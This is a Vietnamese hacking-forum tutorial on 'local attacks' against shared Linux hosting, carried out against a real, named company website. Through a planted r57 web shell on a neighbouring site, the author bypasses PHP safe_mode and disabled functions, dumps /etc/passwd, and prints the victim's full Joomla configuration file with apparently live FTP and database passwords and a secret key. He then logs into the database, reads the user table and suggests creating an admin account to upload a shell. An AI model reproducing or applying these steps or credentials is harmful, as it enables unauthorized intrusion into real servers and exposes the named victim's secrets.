Local căn bản nhất
Chào anh em, hôm nay làm cái tut local căn bản cho thằng em, tiện thể làm luôn cho mấy mem trong BYG chưa biết local là gì. MÌnh làm cũng mục đích là chia sẻ kinh nghiệm thôi, mọi người cùng xem và góp ý cho video hoàn thiện hơn nhé. Thanks :)
Bài 1 : Local căn bản nhất
::::::::::::::::::::::: Kiến thức mở đầu :::::::::::::::::::::::
Local Attack là gì?
local attack thực chất là việc tấn công từ nội bộ bên trong server, nó giông như việc bạn muốn đột nháp vào 1 căn nhà thì bạn có thể đột nhập vào nhà hàng xóm bên cạnh nhà người đó để từ đó đột nhập sang căn nhà kia.
local hình thành từ khi 1 server chứa đc nhiều website hơn.
Vậy điều kiện của local là gì?
điều kiện của local là victim phải đc đặt trên host share, tức là phải có hàng xóm, chứ nếu dùng server riêng thì local bằng niềm tin. :D
Vậy các bước để local là gì?
Theo mình các bước là như sau:
1- Thu thập thông tin về server victim, gồm có tìm hiểu về server có những site nào, bảo mật ra sao....
2- TÌm kiếm 1 "hàng xóm" bảo mật kém, từ đó tấn công website đó, up backdoor
3- sử dụng backdoor để tấn công sang victim
Theo mình đó là những bước chính trong local
Trong giới hạn kiến thức của mình, mình xin đc giời thiếu về local server linux, server win thì chưa đủ trình, mong mọi người chỉ bảo thêm :)
ok, nói thế đủ rồi, bắt tay vào việc nhé
Trong giới hạn của video hôm nay, mình sẽ hướng dẫn các bạn cách local cơ bản nhất, đó là sử dụng lệnh cat, dir, cd .
::::::::::::::::::::::: HƯỚNG DẪN SỬ DỤNG LỆNH :::::::::::::::::::::::
cat - lệnh này có tác dụng view file, có dạng cat <đường dẫn file>
dir - lệnh này có tác dụng chuyển đường dẫn thực thi, có dạng dir <đường dẫn mới>
cd - lệnh này có tác dụng chuyển đổi thư mục, có dạng cd <thư mục muốn chuyển đến>
OK bắt tay vào nào
::::::::::::::::::::::: NGUYÊN LIỆU :::::::::::::::::::::::
1. http://ip.iuvn.net/ đây là trang mình dùng để reserver ip, một hình thức để kiểm tra trên server có những site nào
2. http://dtj.com.vn/favicon.php shell trên server, nó là 1 backdoor, ở đây mình dùng con shell r57 đã đc mod lại.
3. victim: http://hntel.vn/ hôm nay ta sẽ chọn site này làm victim
ok rồi, ta chọn lấy bất kì 1 site nhé.
4. Một chút kiến thức về lệnh linux
::::::::::::::::::::::: THÔNG TIN VICTIM :::::::::::::::::::::::
đây là thông tin về server
Safe_Mode: ON >>>>>>> cái này giúp ta có thể run đc lệnh, ok do cái này đang ON nên ta sẽ hạ nó xuống OFF nhé,
cách làm với server này đơn giản thôi
Open_Basedir: NONE Safe_Exec_Dir: NONE Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.13 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source >>>>>>>>đây là những hàm đã bị dis đi
Downloaders: fopen
Free space : 24.12 GB Total space: 140.41 GB
Đây là 1 server khá đặc biêt, đặc biệt ở chỗ là nó cho run lệnh cd, cat, dir thoải mái, hiện nay còn khá ít server cho sử dụng các lệnh này thoải mái
Safe_Mode: OFF >>> ok xuống OFF rồi, thực ra là ta tạo ra 1 file php.ini để config. cái này tùy từng server mới làm đc thôi.
Open_Basedir: NONE Safe_Exec_Dir: /usr/local/php/bin Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.13 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : NONE >>>>>> các hàm bị dis đã đc gỡ :)
Useful: gcc, lcc, cc, ld, php, perl, python, ruby, make, tar, gzip, bzip, bzip2, nc, locate, suidperl
Downloaders: fopen
Free space : 24.12 GB Total space: 140.41 GB
admin:x:502:503::/home/admin:/bin/false
alesms:x:504:505::/home/alesms:/bin/false
babysky:x:505:506::/home/babysky:/bin/false
bietthu:x:506:507::/home/bietthu:/bin/false
bookfortic:x:508:509::/home/bookfortic:/bin/false
chungcu:x:509:510::/home/chungcu:/bin/false
democomsof:x:510:511::/home/democomsof:/bin/false
dtj:x:511:512::/home/dtj:/bin/false
hntel:x:512:513::/home/hntel:/bin/false >>>> đây là victim của chúng ta
hoatuoi:x:513:514::/home/hoatuoi:/bin/false
idtgroup:x:514:515::/home/idtgroup:/bin/false
ipress:x:515:516::/home/ipress:/bin/false
kalista:x:516:517::/home/kalista:/bin/false
melinsteel:x:517:518::/home/melinsteel:/bin/false
ngoclanxec:x:518:519::/home/ngoclanxec:/bin/false
nhachinhch:x:519:520::/home/nhachinhch:/bin/false
officecoms:x:520:521::/home/officecoms:/bin/false
phanmemket:x:521:522::/home/phanmemket:/bin/false
quangcao15:x:522:523::/home/quangcao15:/bin/false
sanbatdong:x:523:524::/home/sanbatdong:/bin/false
sasopen:x:524:525::/home/sasopen:/bin/false
đây là 1 vài user của server
cat /etc/passwd đây là lệnh get user, nó có nghĩa là xem file /etc/passwd <file này chứa các thông tin về user trên server>
dir /home/hntel/public_html , nó có nghĩa là xem thư mục /home/hntel/public_html đây là thư mục chứa victim.
400.shtml CREDITS.php configuration.php index.php plugins
401.shtml INSTALL.php configuration.php-dist index2.php robots.txt
403.shtml LICENSE.php default.html language templates
404.shtml LICENSES.php favicon.ico libraries tmp
500.php administrator htaccess.txt logo.jpg xmlrpc
500.shtml cache images logs
CHANGELOG.php cgi-bin includes media
COPYRIGHT.php components index.html.bak modules
như các bạn thấy ở đây. đây là toàn bộ cấu trúc site victim
ta view file config nhé.
cat /home/hntel/public_html/configuration.php
<?php
class JConfig {
var $offline = '0';
var $editor = 'tinymce';
var $list_limit = '20';
var $helpurl = 'http://help.joomla.org';
var $debug = '0';
var $debug_lang = '0';
var $sef = '0';
var $sef_rewrite = '0';
var $sef_suffix = '0';
var $feed_limit = '10';
var $feed_email = 'author';
var $secret = 'PLktu2N09BPllCdZ';
var $gzip = '0';
var $error_reporting = '-1';
var $xmlrpc_server = '0';
var $log_path = '/home/hntel/domains/hntel.vn/public_html/logs';
var $tmp_path = '/home/hntel/domains/hntel.vn/public_html/tmp';
var $live_site = '';
var $force_ssl = '0';
var $offset = '7';
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
var $memcache_settings = array();
var $ftp_enable = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '[email protected]';
var $ftp_pass = 'Hntel*2009;';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'hntel_db1';
var $db = 'hntel_db1';
var $dbprefix = 'jos_';
var $mailer = 'mail';
var $mailfrom = '[email protected]';
var $fromname = 'Công ty cổ phần viễn thông Hoàng Nam';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
var $MetaAuthor = '1';
var $MetaTitle = '1';
var $lifetime = '15';
var $session_handler = 'database';
var $password = 'YMGOye15';
var $sitename = 'Công ty cổ phần viễn thông Hoàng Nam';
var $MetaDesc = 'Joomla! - hệ thống quản lý nội dung và cổng giao tiếp động.';
var $MetaKeys = 'joomla, Joomla';
var $offline_message = 'Trang Web này đang tạm ngừng để bảo dưỡng. Và sẽ hoạt động trở lại sớm nhất.';
}
?>
đây là file config của victim, xem qua nhé
var $ftp_enable = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '[email protected]';
var $ftp_pass = 'Hntel*2009;';
var $ftp_root = '';
acc ftp của victim, thằng admin này ngu quá :D
thử nhé
ok sai rồi, vậy là nó ghi thế để lừa mình :">
ko sao còn nhiều thông tin mà :D
ar $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'hntel_db1';
var $db = 'hntel_db1';
var $password = 'YMGOye15';
thông tin db cảu victim.
giờ thì connect và vọc thôi :D
Ok connect db thành công
giờ thì xem qua 1 chút nhé :)
select * from jos_users câu lệnh sql có nghĩa là xem tất cả từ tables jos_users <chứa thông tin về thành viên website>
vừa rồi là những thánh viên của site này
nếu muốn tấn công tiếp thì ta có thể tạo 1 acc mới, update quyền admin và vào up shell thôi
:)
OK
End tut----------
Mr.P1n3 - BYG - XgR
Special thanks for all!
Bạn đang đọc truyện trên: Truyen247.Pro